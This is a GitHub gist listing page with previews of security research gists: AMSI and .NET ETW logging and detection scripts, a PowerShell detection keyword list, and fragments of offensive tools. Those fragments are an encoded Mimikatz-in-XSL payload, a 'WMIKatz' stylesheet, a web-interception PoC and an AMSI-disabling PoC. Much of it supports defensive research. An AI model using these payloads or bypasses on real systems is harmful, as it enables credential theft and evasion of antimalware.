lctrcl lctrcl
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| data:application/x-zip-compressed;base64,UEsDBBQAAAAIANKTaUzM9B2HXvQPABwIUAAMAAAAbWltaWthdHoueHNs7F1Jj+U+ET/TUn+HZk6AeiCLEzsIkBCcEJzggMQBsTQwaIb5a2ZYPz21/2wnee/1MHCh1d3peCuXy7W57CTf+8fHt9/9+Omfb58+/unp6dPDP969/cvH71Lm91/96dOnr777ne/8/e9///bf52+///DH74zbtn3nlz//6Xd+8eE3f/n4h/cf3r2yBu8+fv/VXz/85bsff/enp3e/+fj63ZvffXj/8f0fPr3+3ft3DO6T1/zbb7Xmpz89vaac1394Q11Ljdd/+61X+uvHpw/ff/XV29/87ulP79/+/unDq4e/PX34+Ob9X77/avz28OoH93ff+/rr1w8/ev/VPz+8+eOfPj1843fffPiZd0r5H756/+E3n6jBtx8efvj27YPU+vjw4Ykg/+3p999+eP2agBAYHv/7v3766q+fHt49ffrT+99//9Wnp38Quu/fvfkkGP7+6Xdvf0PApPd/Pn189fDmL79/+sun77/6y/tX3yEoRsMPb756/fErQvnh6e3TO6pANPnWq4fvaD/vPhJxqMqnhzfvvrLy1199ePrDm38QQT7yEN/+5i9//Otv/vj0/Vc/+blU1XH+6kc//uEvfvgrhvK1+7u//ebDA9V+85u3b/719Ptfv//tnx++/0CFw+P4OMjPtCz1n+XjJ0XOnB7L/DhO4+M4LvS3Po7DSH/bY1of12Kp8nh/p3fz45a9GrXU8jHR/4VKuCrfEsAJFRku1xoe88S3VmuIxrMhU672KHeUYX1K/5KVCpUR2p5B/5P1NXDhzD90cz5a6rDq/b842jQ/th1Rz11X68YAOMktGOGbJ+pZiN/fPRP1fAGJMllqCkS2rYfMFXOmjr3hVgJ6nrmGAhi/HL23x0m4iwVkC14jlEMYJr8rn03j+7svhe6ePS4yh8whCYYPgfNtCJPOvrZd5K+ |
lctrcl
/ gist:692dd338acc00a8a8f6b8af59e7d387f
Created
February 11, 2019 22:15
WMIKatz - Are you afraid
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0"> | |
| <!-- Copyright (c) Microsoft Corporation. All rights reserved. --> | |
| <xsl:output method="text" omit-xml-declaration="yes" indent="no"/> | |
| <xsl:strip-space elements="*" /> | |
| <ms:script implements-prefix="user" language="JScript"> | |
| <![CDATA[ | |
lctrcl
/ AMSIScriptContentRetrieval.ps1
Created
February 7, 2019 13:58
— forked from mattifestation/AMSIScriptContentRetrieval.ps1
PoC code used to demonstrate extracting script contents using the AMSI ETW provider
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Script author: Matt Graeber (@mattifestation) | |
| # logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets | |
| # Do your malicious things here that would be logged by AMSI | |
| # logman stop AMSITrace -ets | |
| $OSArchProperty = Get-CimInstance -ClassName Win32_OperatingSystem -Property OSArchitecture | |
| $OSArch = $OSArchProperty.OSArchitecture | |
| $OSPointerSize = 32 | |
| if ($OSArch -eq '64-bit') { $OSPointerSize = 64 } |
lctrcl
/ dotnet-runtime-etw.py
Created
February 7, 2019 13:28
— forked from countercept/dotnet-runtime-etw.py
A research aid for tracing security relevant events in the CLR via ETW for detecting malicious assemblies.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import etw | |
| import etw.evntrace | |
| import sys | |
| import argparse | |
| import threading | |
| class RundownDotNetETW(etw.ETW): | |
| def __init__(self, verbose, high_risk_only): |
lctrcl
/ CollectDotNetEvents.ps1
Created
February 7, 2019 12:24
— forked from mattifestation/CollectDotNetEvents.ps1
A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets | |
| # Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass | |
| # logman stop dotNetTrace -ets | |
| # This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe | |
| # I got the process ID by running a procmon trace | |
| $TargetProcessId = 8256 |
lctrcl
/ EnableAMSILogging.ps1
Created
February 7, 2019 12:24
— forked from mattifestation/EnableAMSILogging.ps1
Enables AMSI logging to the AMSI/Operational event log
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Run this elevated, reboot, boom. | |
| # Feel free to name this whatever you want | |
| $AutoLoggerName = 'MyAMSILogger' | |
| $AutoLoggerGuid = "{$((New-Guid).Guid)}" | |
| New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled | |
| Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41 |
lctrcl
/ process_image_logging.ps1
Created
February 1, 2019 12:50
— forked from mattifestation/process_image_logging.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # These values were obtained from: logman query providers Microsoft-Windows-Kernel-Process | |
| $WINEVENT_KEYWORD_PROCESS = 0x10 | |
| $WINEVENT_KEYWORD_IMAGE = 0x40 | |
| # Normally when you enable an analytic log, all keywords are logged which can be veeeeerrrrryy noisy. | |
| # I'm going to limit collection to only image and process event | |
| $KernelProcessLog = New-Object -TypeName System.Diagnostics.Eventing.Reader.EventLogConfiguration -ArgumentList 'Microsoft-Windows-Kernel-Process/Analytic' | |
| $KernelProcessLog.ProviderKeywords = ($WINEVENT_KEYWORD_PROCESS -bor $WINEVENT_KEYWORD_IMAGE) | |
| $KernelProcessLog.ProviderLevel = 0xFF | |
| $KernelProcessLog.IsEnabled = $true |
lctrcl
/ InterceptorThing.ps1
Created
December 20, 2018 09:03
Interceptor - Normal User No Admin Required.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| This script demonstrates the ability to capture and tamper with Web sessions. | |
| For secure sessions, this is done by dynamically writing certificates to match the requested domain. | |
| This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack. | |
| Function: Interceptor | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
lctrcl
/ CorruptCLRGlobal.ps1
Created
December 8, 2018 20:49
— forked from mattifestation/CorruptCLRGlobal.ps1
A PoC function to corrupt the g_amsiContext global variable in clr.dll in .NET Framework Early Access build 3694
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Subvert-CLRAntiMalware { | |
| <# | |
| .SYNOPSIS | |
| A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694. | |
| .DESCRIPTION | |
| clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open. |
lctrcl
/ PoshNaughtyList
Created
June 17, 2017 06:18
— forked from MatthewDemaske/PoshNaughtyList
Powershell NaughtyWord List
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *ExecuteShellCommand* | |
| *GetDelegateForFunctionPointer* | |
| *GetModuleHandle* | |
| *GetProcAddress* | |
| *Groups.User.Properties.cpassword* | |
| *IMAGE_NT_OPTIONAL_HDR64_MAGIC* | |
| *InteropServices.HandleRef* | |
| *kernel32.dll* | |
| *LSA_UNICODE_STRING* | |
| *Management.Automation.RuntimeException* |